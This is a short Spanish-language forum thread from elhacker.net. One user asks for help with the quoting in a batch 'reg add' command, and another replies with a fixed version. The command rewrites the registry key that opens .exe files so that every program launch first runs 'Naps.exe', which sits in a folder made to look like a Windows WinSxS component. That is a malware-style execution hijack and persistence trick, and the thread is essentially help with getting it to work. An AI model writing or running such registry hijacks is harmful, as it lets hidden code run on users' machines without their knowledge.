Test Foro de elhacker.net SMF 2.1

Programación => Scripting => Mensaje iniciado por: Napster.A530 en 22 Julio 2010, 19:57 PM

Título: Registro de Windows(batch)
Publicado por: Napster.A530 en 22 Julio 2010, 19:57 PM
esta clave esta bien? o me marcara Error? en especial con las comillas " jee

Código (dos) [Seleccionar]
reg add "HKCR\exefile\shell\open\command" /v asd /t REG_SZ /d  ""%windir%\WinSxS\x86_Microsoft.Windows.Common-Controls_Corvet\Naps.exe" "%1" %*" /f

Saludos!

Título: Re: Registro de Windows(batch)
Publicado por: maxx93 en 22 Julio 2010, 20:43 PM
Fijate si te anda asi...


reg add "HKCR\exefile\shell\open\command" /v asd /t REG_SZ /d  "%windir%\WinSxS\x86_Microsoft.Windows.Common-Controls_Corvet\Naps.exe" "%1" "%*" /f


Salu2